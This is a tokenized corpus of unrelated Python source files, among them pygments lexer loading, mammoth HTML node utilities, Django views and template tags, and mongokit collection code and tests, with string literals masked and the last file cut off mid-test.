<s> from __future__ import print_function <EOL> import unittest <EOL> import time <EOL> from mwclient . util import parse_timestamp <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> print ( ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( "<STR_LIT>" ) <EOL> print ( ) <EOL> class TestUtil ( unittest . TestCase ) : <EOL> def test_parse_empty_timestamp ( self ) : <EOL> assert ( <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:0> ) == parse_timestamp ( '<STR_LIT>' ) <EOL> def test_parse_nonempty_timestamp ( self ) : <EOL> assert time . struct_time ( [ <NUM_LIT> , <NUM_LIT:1> , <NUM_LIT:2> , <NUM_LIT:20> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT:4> , <NUM_LIT:2> , - <NUM_LIT:1> ] ) == parse_timestamp ( '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> from . . lists import flat_map <EOL> from . nodes import TextNode , Element , SelfClosingElement , ForceWrite , NodeVisitor <EOL> def text ( value ) : <EOL> return TextNode ( value ) <EOL> def element ( tag_names , attributes = None , children = None , collapsible = False ) : <EOL> if not isinstance ( tag_names , list ) : <EOL> tag_names = [ tag_names ] <EOL> if attributes is None : <EOL> attributes = { } <EOL> if children is None : <EOL> children = [ ] <EOL> return Element ( tag_names , attributes , children , collapsible = collapsible ) <EOL> def collapsible_element ( tag_names , attributes = None , children = None ) : <EOL> return element ( tag_names , attributes , children , collapsible = True ) <EOL> def self_closing_element ( tag_name , attributes = None ) : <EOL> if attributes is None : <EOL> attributes = { } <EOL> return SelfClosingElement ( tag_name , attributes ) <EOL> force_write = ForceWrite ( ) <EOL> def strip_empty ( nodes ) : <EOL> return flat_map ( _strip_empty_node , nodes ) <EOL> def _strip_empty_node ( node ) : <EOL> return StripEmpty ( ) . visit ( node ) <EOL> class StripEmpty ( NodeVisitor ) : <EOL> def visit_text_node ( self , node ) : <EOL> if node . value : <EOL> return [ node ] <EOL> else : <EOL> return [ ] <EOL> def visit_element ( self , element ) : <EOL> children = strip_empty ( element . children ) <EOL> if len ( children ) == <NUM_LIT:0> : <EOL> return [ ] <EOL> else : <EOL> return [ Element ( <EOL> element . tag_names , <EOL> element . attributes , <EOL> children , <EOL> collapsible = element . collapsible ) ] <EOL> def visit_self_closing_element ( self , element ) : <EOL> return [ element ] <EOL> def visit_force_write ( self , node ) : <EOL> return [ node ] <EOL> def collapse ( nodes ) : <EOL> collapsed = [ ] <EOL> for node in nodes : <EOL> _collapsing_add ( collapsed , node ) <EOL> return collapsed <EOL> class _CollapseNode ( NodeVisitor ) : <EOL> def visit_text_node ( self , node ) : <EOL> return node <EOL> def visit_element ( self , element ) : <EOL> return Element ( <EOL> element . tag_names , <EOL> element . attributes , <EOL> collapse ( element . children ) , <EOL> collapsible = element . collapsible ) <EOL> def visit_self_closing_element ( self , element ) : <EOL> return element <EOL> def visit_force_write ( self , node ) : <EOL> return node <EOL> _collapse_node = _CollapseNode ( ) . visit <EOL> def _collapsing_add ( collapsed , node ) : <EOL> collapsed_node = _collapse_node ( node ) <EOL> if not _try_collapse ( collapsed , collapsed_node ) : <EOL> collapsed . append ( collapsed_node ) <EOL> def _try_collapse ( collapsed , node ) : <EOL> if not collapsed : <EOL> return False <EOL> last = collapsed [ - <NUM_LIT:1> ] <EOL> if not isinstance ( last , Element ) or not isinstance ( node , Element ) : <EOL> return False <EOL> if not node . collapsible : <EOL> return False <EOL> if not _is_match ( last , node ) : <EOL> return False <EOL> for child in node . children : <EOL> _collapsing_add ( last . children , child ) <EOL> return True <EOL> def _is_match ( first , second ) : <EOL> return first . tag_name in second . tag_names and first . attributes == second . attributes <EOL> def write ( writer , nodes ) : <EOL> visitor = _NodeWriter ( writer ) <EOL> visitor . visit_all ( nodes ) <EOL> class _NodeWriter ( NodeVisitor ) : <EOL> def __init__ ( self , writer ) : <EOL> self . _writer = writer <EOL> def visit_text_node ( self , node ) : <EOL> self . _writer . text ( node . value ) <EOL> def visit_element ( self , element ) : <EOL> self . _writer . start ( element . tag_name , element . attributes ) <EOL> self . visit_all ( element . children ) <EOL> self . _writer . end ( element . tag_name ) <EOL> def visit_self_closing_element ( self , element ) : <EOL> self . _writer . self_closing ( element . tag_name , element . attributes ) <EOL> def visit_force_write ( self , element ) : <EOL> pass <EOL> def visit_all ( self , nodes ) : <EOL> for node in nodes : <EOL> self . visit ( node ) </s>
<s> from __future__ import unicode_literals <EOL> import io <EOL> from nose . tools import istest , assert_equal <EOL> from mammoth . docx import xmlparser as xml , office_xml <EOL> @ istest <EOL> def alternate_content_is_replaced_by_contents_of_fallback ( ) : <EOL> xml_string = ( <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' + <EOL> '<STR_LIT>' ) <EOL> result = office_xml . read ( io . StringIO ( xml_string ) ) <EOL> assert_equal ( [ xml . element ( "<STR_LIT>" ) ] , result . children ) </s>
<s> import os <EOL> import spur <EOL> import spur . ssh <EOL> def create_ssh_shell ( missing_host_key = None , shell_type = None ) : <EOL> port_var = os . environ . get ( "<STR_LIT>" ) <EOL> port = int ( port_var ) if port_var is not None else None <EOL> return spur . SshShell ( <EOL> hostname = os . environ . get ( "<STR_LIT>" , "<STR_LIT:127.0.0.1>" ) , <EOL> username = os . environ [ "<STR_LIT>" ] , <EOL> password = os . environ [ "<STR_LIT>" ] , <EOL> port = port , <EOL> missing_host_key = ( missing_host_key or spur . ssh . MissingHostKey . accept ) , <EOL> shell_type = shell_type , <EOL> ) </s>
<s> import os <EOL> from setuptools import setup , find_packages <EOL> def read ( fname ) : <EOL> return open ( os . path . join ( os . path . dirname ( __file__ ) , fname ) ) . read ( ) <EOL> setup ( <EOL> name = "<STR_LIT>" , <EOL> version = "<STR_LIT>" , <EOL> url = '<STR_LIT>' , <EOL> license = '<STR_LIT>' , <EOL> description = "<STR_LIT>" , <EOL> long_description = read ( '<STR_LIT>' ) , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> packages = find_packages ( '<STR_LIT:src>' ) , <EOL> package_dir = { '<STR_LIT>' : '<STR_LIT:src>' } , <EOL> install_requires = [ '<STR_LIT>' ] , <EOL> classifiers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) </s>
<s> from django . core . urlresolvers import reverse <EOL> from django . template . defaultfilters import slugify <EOL> from django . core . paginator import Paginator , InvalidPage , EmptyPage <EOL> from django . http import Http404 , HttpResponseForbidden , HttpResponseServerError , HttpResponseRedirect <EOL> from django . shortcuts import render_to_response <EOL> from django . template import RequestContext <EOL> from contacts . models import Group <EOL> from contacts . forms import GroupCreateForm , GroupUpdateForm <EOL> def list ( request , page = <NUM_LIT:1> , template = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> group_list = Group . objects . all ( ) <EOL> paginator = Paginator ( group_list , <NUM_LIT:20> ) <EOL> try : <EOL> groups = paginator . page ( page ) <EOL> except ( EmptyPage , InvalidPage ) : <EOL> groups = paginator . page ( paginator . num_pages ) <EOL> kwvars = { <EOL> '<STR_LIT>' : groups . object_list , <EOL> '<STR_LIT>' : groups . has_next ( ) , <EOL> '<STR_LIT>' : groups . has_previous ( ) , <EOL> '<STR_LIT>' : groups . has_other_pages ( ) , <EOL> '<STR_LIT>' : groups . start_index ( ) , <EOL> '<STR_LIT>' : groups . end_index ( ) , <EOL> } <EOL> try : <EOL> kwvars [ '<STR_LIT>' ] = groups . previous_page_number ( ) <EOL> except ( EmptyPage , InvalidPage ) : <EOL> kwvars [ '<STR_LIT>' ] = None <EOL> try : <EOL> kwvars [ '<STR_LIT>' ] = groups . next_page_number ( ) <EOL> except ( EmptyPage , InvalidPage ) : <EOL> kwvars [ '<STR_LIT>' ] = None <EOL> return render_to_response ( template , kwvars , RequestContext ( request ) ) <EOL> def detail ( request , pk , slug = None , template = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> group = Group . objects . get ( pk__iexact = pk ) <EOL> except Group . DoesNotExist : <EOL> raise Http404 <EOL> kwvars = { <EOL> '<STR_LIT:object>' : group , <EOL> } <EOL> return render_to_response ( template , kwvars , RequestContext ( request ) ) <EOL> def create ( request , template = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> user = request . user <EOL> if not user . has_perm ( '<STR_LIT>' ) : <EOL> return HttpResponseForbidden ( ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> group_form = GroupCreateForm ( request . POST ) <EOL> if group_form . is_valid ( ) : <EOL> g = group_form . save ( commit = False ) <EOL> g . slug = slugify ( g . name ) <EOL> g . save ( ) <EOL> return HttpResponseRedirect ( g . get_absolute_url ( ) ) <EOL> else : <EOL> return HttpResponseServerError <EOL> kwvars = { <EOL> '<STR_LIT>' : GroupCreateForm ( request . POST ) <EOL> } <EOL> return render_to_response ( template , kwvars , RequestContext ( request ) ) <EOL> def update ( request , pk , slug = None , template = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> user = request . user <EOL> if not user . has_perm ( '<STR_LIT>' ) : <EOL> return HttpResponseForbidden ( ) <EOL> try : <EOL> group = Group . objects . get ( pk__iexact = pk ) <EOL> except Group . DoesNotExist : <EOL> raise Http404 <EOL> form = GroupUpdateForm ( instance = group ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> form = GroupUpdateForm ( request . POST , instance = group ) <EOL> if form . is_valid ( ) : <EOL> form . save ( ) <EOL> return HttpResponseRedirect ( group . get_absolute_url ( ) ) <EOL> kwvars = { <EOL> '<STR_LIT>' : form , <EOL> '<STR_LIT:object>' : group , <EOL> } <EOL> return render_to_response ( template , kwvars , RequestContext ( request ) ) <EOL> def delete ( request , pk , slug = None , template = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> user = request . user <EOL> if not user . has_perm ( '<STR_LIT>' ) : <EOL> return HttpResponseForbidden ( ) <EOL> try : <EOL> group = Group . objects . get ( pk__iexact = pk ) <EOL> except Group . DoesNotExist : <EOL> raise Http404 <EOL> if request . method == '<STR_LIT:POST>' : <EOL> new_data = request . POST . copy ( ) <EOL> if new_data [ '<STR_LIT>' ] == '<STR_LIT>' : <EOL> group . delete ( ) <EOL> return HttpResponseRedirect ( reverse ( '<STR_LIT>' ) ) <EOL> else : <EOL> return HttpResponseRedirect ( group . get_absolute_url ( ) ) <EOL> kwvars = { <EOL> '<STR_LIT:object>' : group , <EOL> } <EOL> return render_to_response ( template , kwvars , RequestContext ( request ) ) </s>
<s> """<STR_LIT>""" <EOL> import sys <EOL> import types <EOL> import fnmatch <EOL> from os . path import basename <EOL> from pygments . lexers . _mapping import LEXERS <EOL> from pygments . modeline import get_filetype_from_buffer <EOL> from pygments . plugin import find_plugin_lexers <EOL> from pygments . util import ClassNotFound , bytes <EOL> __all__ = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' ] + LEXERS . keys ( ) <EOL> _lexer_cache = { } <EOL> def _load_lexers ( module_name ) : <EOL> """<STR_LIT>""" <EOL> mod = __import__ ( module_name , None , None , [ '<STR_LIT>' ] ) <EOL> for lexer_name in mod . __all__ : <EOL> cls = getattr ( mod , lexer_name ) <EOL> _lexer_cache [ cls . name ] = cls <EOL> def get_all_lexers ( ) : <EOL> """<STR_LIT>""" <EOL> for item in LEXERS . itervalues ( ) : <EOL> yield item [ <NUM_LIT:1> : ] <EOL> for lexer in find_plugin_lexers ( ) : <EOL> yield lexer . name , lexer . aliases , lexer . filenames , lexer . mimetypes <EOL> def find_lexer_class ( name ) : <EOL> """<STR_LIT>""" <EOL> if name in _lexer_cache : <EOL> return _lexer_cache [ name ] <EOL> for module_name , lname , aliases , _ , _ in LEXERS . itervalues ( ) : <EOL> if name == lname : <EOL> _load_lexers ( module_name ) <EOL> return _lexer_cache [ name ] <EOL> for cls in find_plugin_lexers ( ) : <EOL> if cls . name == name : <EOL> return cls <EOL> def get_lexer_by_name ( _alias , ** options ) : <EOL> """<STR_LIT>""" <EOL> for module_name , name , aliases , _ , _ in LEXERS . itervalues ( ) : <EOL> if _alias in aliases : <EOL> if name not in _lexer_cache : <EOL> _load_lexers ( module_name ) <EOL> return _lexer_cache [ name ] ( ** options ) <EOL> for cls in find_plugin_lexers ( ) : <EOL> if _alias in cls . aliases : <EOL> return cls ( ** options ) <EOL> raise ClassNotFound ( '<STR_LIT>' % _alias ) <EOL> def get_lexer_for_filename ( _fn , code = None , ** options ) : <EOL> """<STR_LIT>""" <EOL> matches = [ ] <EOL> fn = basename ( _fn ) <EOL> for modname , name , _ , filenames , _ in LEXERS . itervalues ( ) : <EOL> for filename in filenames : <EOL> if fnmatch . fnmatch ( fn , filename ) : <EOL> if name not in _lexer_cache : <EOL> _load_lexers ( modname ) <EOL> matches . append ( ( _lexer_cache [ name ] , filename ) ) <EOL> for cls in find_plugin_lexers ( ) : <EOL> for filename in cls . filenames : <EOL> if fnmatch . fnmatch ( fn , filename ) : <EOL> matches . append ( ( cls , filename ) ) <EOL> if sys . version_info > ( <NUM_LIT:3> , ) and isinstance ( code , bytes ) : <EOL> code = code . decode ( '<STR_LIT>' ) <EOL> def get_rating ( info ) : <EOL> cls , filename = info <EOL> bonus = '<STR_LIT:*>' not in filename and <NUM_LIT:0.5> or <NUM_LIT:0> <EOL> if code : <EOL> return cls . analyse_text ( code ) + bonus <EOL> return cls . priority + bonus <EOL> if matches : <EOL> matches . sort ( key = get_rating ) <EOL> return matches [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] ( ** options ) <EOL> raise ClassNotFound ( '<STR_LIT>' % _fn ) <EOL> def get_lexer_for_mimetype ( _mime , ** options ) : <EOL> """<STR_LIT>""" <EOL> for modname , name , _ , _ , mimetypes in LEXERS . itervalues ( ) : <EOL> if _mime in mimetypes : <EOL> if name not in _lexer_cache : <EOL> _load_lexers ( modname ) <EOL> return _lexer_cache [ name ] ( ** options ) <EOL> for cls in find_plugin_lexers ( ) : <EOL> if _mime in cls . mimetypes : <EOL> return cls ( ** options ) <EOL> raise ClassNotFound ( '<STR_LIT>' % _mime ) <EOL> def _iter_lexerclasses ( ) : <EOL> """<STR_LIT>""" <EOL> for key in sorted ( LEXERS ) : <EOL> module_name , name = LEXERS [ key ] [ : <NUM_LIT:2> ] <EOL> if name not in _lexer_cache : <EOL> _load_lexers ( module_name ) <EOL> yield _lexer_cache [ name ] <EOL> for lexer in find_plugin_lexers ( ) : <EOL> yield lexer <EOL> def guess_lexer_for_filename ( _fn , _text , ** options ) : <EOL> """<STR_LIT>""" <EOL> fn = basename ( _fn ) <EOL> primary = None <EOL> matching_lexers = set ( ) <EOL> for lexer in _iter_lexerclasses ( ) : <EOL> for filename in lexer . filenames : <EOL> if fnmatch . fnmatch ( fn , filename ) : <EOL> matching_lexers . add ( lexer ) <EOL> primary = lexer <EOL> for filename in lexer . alias_filenames : <EOL> if fnmatch . fnmatch ( fn , filename ) : <EOL> matching_lexers . add ( lexer ) <EOL> if not matching_lexers : <EOL> raise ClassNotFound ( '<STR_LIT>' % fn ) <EOL> if len ( matching_lexers ) == <NUM_LIT:1> : <EOL> return matching_lexers . pop ( ) ( ** options ) <EOL> result = [ ] <EOL> for lexer in matching_lexers : <EOL> rv = lexer . analyse_text ( _text ) <EOL> if rv == <NUM_LIT:1.0> : <EOL> return lexer ( ** options ) <EOL> result . append ( ( rv , lexer ) ) <EOL> def type_sort ( type_ ) : <EOL> return ( type_ [ <NUM_LIT:0> ] , type_ [ <NUM_LIT:1> ] . __name__ ) <EOL> result . sort ( key = type_sort ) <EOL> if not result [ - <NUM_LIT:1> ] [ <NUM_LIT:0> ] and primary is not None : <EOL> return primary ( ** options ) <EOL> return result [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] ( ** options ) <EOL> def guess_lexer ( _text , ** options ) : <EOL> """<STR_LIT>""" <EOL> ft = get_filetype_from_buffer ( _text ) <EOL> if ft is not None : <EOL> try : <EOL> return get_lexer_by_name ( ft , ** options ) <EOL> except ClassNotFound : <EOL> pass <EOL> best_lexer = [ <NUM_LIT:0.0> , None ] <EOL> for lexer in _iter_lexerclasses ( ) : <EOL> rv = lexer . analyse_text ( _text ) <EOL> if rv == <NUM_LIT:1.0> : <EOL> return lexer ( ** options ) <EOL> if rv > best_lexer [ <NUM_LIT:0> ] : <EOL> best_lexer [ : ] = ( rv , lexer ) <EOL> if not best_lexer [ <NUM_LIT:0> ] or best_lexer [ <NUM_LIT:1> ] is None : <EOL> raise ClassNotFound ( '<STR_LIT>' ) <EOL> return best_lexer [ <NUM_LIT:1> ] ( ** options ) <EOL> class _automodule ( types . ModuleType ) : <EOL> """<STR_LIT>""" <EOL> def __getattr__ ( self , name ) : <EOL> info = LEXERS . get ( name ) <EOL> if info : <EOL> _load_lexers ( info [ <NUM_LIT:0> ] ) <EOL> cls = _lexer_cache [ info [ <NUM_LIT:1> ] ] <EOL> setattr ( self , name , cls ) <EOL> return cls <EOL> raise AttributeError ( name ) <EOL> oldmod = sys . modules [ '<STR_LIT>' ] <EOL> newmod = _automodule ( '<STR_LIT>' ) <EOL> newmod . __dict__ . update ( oldmod . __dict__ ) <EOL> sys . modules [ '<STR_LIT>' ] = newmod <EOL> del newmod . newmod , newmod . oldmod , newmod . sys , newmod . types </s>
<s> class PyleaseError ( Exception ) : <EOL> def __init__ ( self , message = '<STR_LIT>' , * args , ** kwargs ) : <EOL> super ( PyleaseError , self ) . __init__ ( * args , ** kwargs ) <EOL> self . message = message <EOL> class VersionSpecError ( PyleaseError ) : <EOL> pass <EOL> class ReleaseError ( PyleaseError ) : <EOL> pass <EOL> class UploadError ( PyleaseError ) : <EOL> pass </s>
<s> from datetime import date <EOL> from django . db import IntegrityError <EOL> from propaganda . models import Propaganda , Subscriber , Pamphlet <EOL> def generate_pamphlets ( propaganda = None , subscribers = None , delivery_date = None ) : <EOL> """<STR_LIT>""" <EOL> pamphlets = [ ] <EOL> email = propaganda or Propaganda . objects . latest ( '<STR_LIT:id>' ) <EOL> subscribers = subscribers or Subscriber . objects . filter ( active = True ) <EOL> delivery_date = delivery_date or date . today ( ) <EOL> for subscriber in subscribers : <EOL> try : <EOL> pamphlet = Pamphlet . objects . create ( propaganda = email , <EOL> subscriber = subscriber , delivery_date = delivery_date ) <EOL> except IntegrityError : <EOL> pass <EOL> else : <EOL> pamphlets . append ( pamphlet ) <EOL> return pamphlets </s>
<s> from optparse import OptionParser <EOL> from kahuna . abstract import AbsPlugin <EOL> from kahuna . utils . prettyprint import pprint_tiers <EOL> from kahuna . utils . prettyprint import pprint_vdcs <EOL> from org . jclouds . abiquo . predicates . cloud import VirtualDatacenterPredicates <EOL> from org . jclouds . abiquo . domain . exception import AbiquoException <EOL> from org . jclouds . rest import AuthorizationException <EOL> class VirtualDatacenterPlugin ( AbsPlugin ) : <EOL> """<STR_LIT>""" <EOL> def list ( self , args ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> cloud = self . _context . getCloudService ( ) <EOL> vdcs = cloud . listVirtualDatacenters ( ) <EOL> pprint_vdcs ( vdcs ) <EOL> except ( AbiquoException , AuthorizationException ) , ex : <EOL> print "<STR_LIT>" % ex . getMessage ( ) <EOL> def tiers ( self , args ) : <EOL> """<STR_LIT>""" <EOL> parser = OptionParser ( usage = "<STR_LIT>" ) <EOL> parser . add_option ( "<STR_LIT>" , "<STR_LIT>" , <EOL> help = "<STR_LIT>" , dest = "<STR_LIT:name>" ) <EOL> ( options , args ) = parser . parse_args ( args ) <EOL> name = options . name <EOL> if not name : <EOL> parser . print_help ( ) <EOL> return <EOL> try : <EOL> cloud = self . _context . getCloudService ( ) <EOL> vdc = cloud . findVirtualDatacenter ( <EOL> VirtualDatacenterPredicates . name ( name ) ) <EOL> if vdc : <EOL> tiers = vdc . listStorageTiers ( ) <EOL> pprint_tiers ( tiers ) <EOL> else : <EOL> print "<STR_LIT>" % name <EOL> except ( AbiquoException , AuthorizationException ) , ex : <EOL> print "<STR_LIT>" % ex . getMessage ( ) <EOL> def load ( ) : <EOL> """<STR_LIT>""" <EOL> return VirtualDatacenterPlugin ( ) </s>
<s> def dunderkey ( * args ) : <EOL> """<STR_LIT>""" <EOL> return '<STR_LIT>' . join ( args ) <EOL> def dunder_partition ( key ) : <EOL> """<STR_LIT>""" <EOL> parts = key . rsplit ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> return tuple ( parts ) if len ( parts ) > <NUM_LIT:1> else ( parts [ <NUM_LIT:0> ] , None ) <EOL> def dunder_init ( key ) : <EOL> """<STR_LIT>""" <EOL> return dunder_partition ( key ) [ <NUM_LIT:0> ] <EOL> def dunder_last ( key ) : <EOL> """<STR_LIT>""" <EOL> return dunder_partition ( key ) [ <NUM_LIT:1> ] <EOL> def dunder_get ( _dict , key ) : <EOL> """<STR_LIT>""" <EOL> parts = key . split ( '<STR_LIT>' , <NUM_LIT:1> ) <EOL> try : <EOL> result = _dict [ parts [ <NUM_LIT:0> ] ] <EOL> except KeyError : <EOL> return None <EOL> else : <EOL> return result if len ( parts ) == <NUM_LIT:1> else dunder_get ( result , parts [ <NUM_LIT:1> ] ) <EOL> def undunder_keys ( _dict ) : <EOL> """<STR_LIT>""" <EOL> def f ( key , value ) : <EOL> parts = key . split ( '<STR_LIT>' ) <EOL> return { <EOL> parts [ <NUM_LIT:0> ] : value if len ( parts ) == <NUM_LIT:1> else f ( parts [ <NUM_LIT:1> ] , value ) <EOL> } <EOL> result = { } <EOL> for r in [ f ( k , v ) for k , v in _dict . items ( ) ] : <EOL> rk = list ( r . keys ( ) ) [ <NUM_LIT:0> ] <EOL> if rk not in result : <EOL> result . update ( r ) <EOL> else : <EOL> result [ rk ] . update ( r [ rk ] ) <EOL> return result <EOL> def dunder_truncate ( _dict ) : <EOL> """<STR_LIT>""" <EOL> keylist = list ( _dict . keys ( ) ) <EOL> def decide_key ( k , klist ) : <EOL> newkey = dunder_last ( k ) <EOL> return newkey if list ( map ( dunder_last , klist ) ) . count ( newkey ) == <NUM_LIT:1> else k <EOL> original_keys = [ decide_key ( key , keylist ) for key in keylist ] <EOL> return dict ( zip ( original_keys , _dict . values ( ) ) ) </s>
<s> """<STR_LIT>""" <EOL> from django import template <EOL> from django . template . loader_tags import BlockNode , do_block <EOL> from django . conf import settings <EOL> register = template . Library ( ) <EOL> def set_repeated_blocks ( parser ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> parser . _repeated_blocks <EOL> except AttributeError : <EOL> parser . _repeated_blocks = { } <EOL> @ register . tag <EOL> def repeated_block ( parser , token ) : <EOL> try : <EOL> tag_name , block_name = token . split_contents ( ) <EOL> except ValueError : <EOL> raise template . TemplateSyntaxError ( <EOL> '<STR_LIT>' . format ( <EOL> token . contents . split ( ) [ <NUM_LIT:0> ] ) ) <EOL> set_repeated_blocks ( parser ) <EOL> block_node = do_block ( parser , token ) <EOL> parser . _repeated_blocks [ block_name ] = block_node <EOL> return block_node <EOL> @ register . tag <EOL> def repeat ( parser , token ) : <EOL> try : <EOL> tag_name , block_name = token . split_contents ( ) <EOL> except ValueError : <EOL> raise template . TemplateSyntaxError ( <EOL> '<STR_LIT>' . format ( <EOL> token . contents . split ( ) [ <NUM_LIT:0> ] ) ) <EOL> try : <EOL> block_node = parser . _repeated_blocks [ block_name ] <EOL> except ( AttributeError , KeyError ) : <EOL> raise template . TemplateSyntaxError ( <EOL> "<STR_LIT>" . format ( <EOL> block_name , tag_name ) ) <EOL> return block_node </s>
<s> from pymongo . collection import Collection as PymongoCollection <EOL> from mongokit . mongo_exceptions import MultipleResultsFound <EOL> from mongokit . cursor import Cursor <EOL> from warnings import warn <EOL> class Collection ( PymongoCollection ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> self . _documents = { } <EOL> self . _collections = { } <EOL> super ( Collection , self ) . __init__ ( * args , ** kwargs ) <EOL> self . _registered_documents = self . database . connection . _registered_documents <EOL> def __getattr__ ( self , key ) : <EOL> if key in self . _registered_documents : <EOL> if not key in self . _documents : <EOL> self . _documents [ key ] = self . _registered_documents [ key ] ( collection = self ) <EOL> if hasattr ( self . _documents [ key ] , "<STR_LIT>" ) and self . _documents [ key ] . i18n : <EOL> self . _documents [ key ] ( ) <EOL> if self . _documents [ key ] . indexes : <EOL> warn ( '<STR_LIT>' <EOL> '<STR_LIT>' % self . _documents [ key ] . _obj_class . __name__ , <EOL> DeprecationWarning ) <EOL> return self . _documents [ key ] <EOL> else : <EOL> newkey = u"<STR_LIT>" % ( self . name , key ) <EOL> if not newkey in self . _collections : <EOL> self . _collections [ newkey ] = Collection ( self . database , newkey ) <EOL> return self . _collections [ newkey ] <EOL> def __call__ ( self , * args , ** kwargs ) : <EOL> if "<STR_LIT:.>" not in self . __name : <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % <EOL> self . __name ) <EOL> name = self . __name . split ( "<STR_LIT:.>" ) [ - <NUM_LIT:1> ] <EOL> raise TypeError ( "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" <EOL> "<STR_LIT>" % ( name , name ) ) <EOL> def find ( self , * args , ** kwargs ) : <EOL> if not '<STR_LIT>' in kwargs and hasattr ( self , '<STR_LIT>' ) : <EOL> kwargs [ '<STR_LIT>' ] = self . slave_okay <EOL> if not '<STR_LIT>' in kwargs and hasattr ( self , '<STR_LIT>' ) : <EOL> kwargs [ '<STR_LIT>' ] = self . read_preference <EOL> if not '<STR_LIT>' in kwargs and hasattr ( self , '<STR_LIT>' ) : <EOL> kwargs [ '<STR_LIT>' ] = self . tag_sets <EOL> if not '<STR_LIT>' in kwargs and hasattr ( self , '<STR_LIT>' ) : <EOL> kwargs [ '<STR_LIT>' ] = ( <EOL> self . secondary_acceptable_latency_ms <EOL> ) <EOL> return Cursor ( self , * args , ** kwargs ) <EOL> find . __doc__ = PymongoCollection . find . __doc__ + """<STR_LIT>""" <EOL> def find_and_modify ( self , * args , ** kwargs ) : <EOL> obj_class = kwargs . pop ( '<STR_LIT>' , None ) <EOL> doc = super ( Collection , self ) . find_and_modify ( * args , ** kwargs ) <EOL> if doc and obj_class : <EOL> return self . collection [ obj_class . __name__ ] ( doc ) <EOL> return doc <EOL> find_and_modify . __doc__ = PymongoCollection . find_and_modify . __doc__ + """<STR_LIT>""" <EOL> def get_from_id ( self , id ) : <EOL> """<STR_LIT>""" <EOL> return self . find_one ( { "<STR_LIT>" : id } ) <EOL> def one ( self , * args , ** kwargs ) : <EOL> bson_obj = self . find ( * args , ** kwargs ) <EOL> count = bson_obj . count ( ) <EOL> if count > <NUM_LIT:1> : <EOL> raise MultipleResultsFound ( "<STR_LIT>" % count ) <EOL> elif count == <NUM_LIT:1> : <EOL> return bson_obj . next ( ) <EOL> def find_random ( self ) : <EOL> """<STR_LIT>""" <EOL> import random <EOL> max = self . count ( ) <EOL> if max : <EOL> num = random . randint ( <NUM_LIT:0> , max - <NUM_LIT:1> ) <EOL> return self . find ( ) . skip ( num ) . next ( ) <EOL> def find_fulltext ( self , search , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return self . database . command ( "<STR_LIT:text>" , self . name , search = search , ** kwargs ) </s>
<s> import unittest <EOL> from mongokit import Document , Connection <EOL> class InheritedQueriesTestCase ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . connection = Connection ( safe = True ) <EOL> self . col = self . connection [ '<STR_LIT:test>' ] [ '<STR_LIT>' ] <EOL> def tearDown ( self ) : <EOL> self . connection . drop_database ( '<STR_LIT:test>' ) <EOL> def test_use_inherited_queries ( self ) : <EOL> @ self . connection . register <EOL> class A ( Document ) : <EOL> __database__ = '<STR_LIT:test>' <EOL> __collection__ = '<STR_LIT>' <EOL> structure = { <EOL> '<STR_LIT>' : unicode , <EOL> '<STR_LIT:a>' : { <EOL> '<STR_LIT:foo>' : int , <EOL> '<STR_LIT:bar>' : unicode , <EOL> } <EOL> } <EOL> @ self . connection . register <EOL> class B ( A ) : <EOL> structure = { <EOL> '<STR_LIT:b>' : { <EOL> '<STR_LIT>' : float , <EOL> } <EOL> } <EOL> doc_a = self . connection . A ( ) <EOL> self . assertEqual ( doc_a [ '<STR_LIT>' ] , '<STR_LIT:A>' ) <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT:3> <EOL> doc_a [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_a . save ( ) <EOL> doc_b = self . connection . B ( ) <EOL> self . assertEqual ( doc_b [ '<STR_LIT>' ] , '<STR_LIT:B>' ) <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:foo>' ] = <NUM_LIT> <EOL> doc_b [ '<STR_LIT:a>' ] [ '<STR_LIT:bar>' ] = u'<STR_LIT>' <EOL> doc_b [ '<STR_LIT:b>' ] [ '<STR_LIT>' ] = <NUM_LIT> <EOL> doc_b . save ( ) <EOL> self . assertTrue ( isinstance ( self . connection . A . find_one ( { '<STR_LIT>' : doc_b [ '<STR_LIT>' ] } ) , B ) ) <EOL> 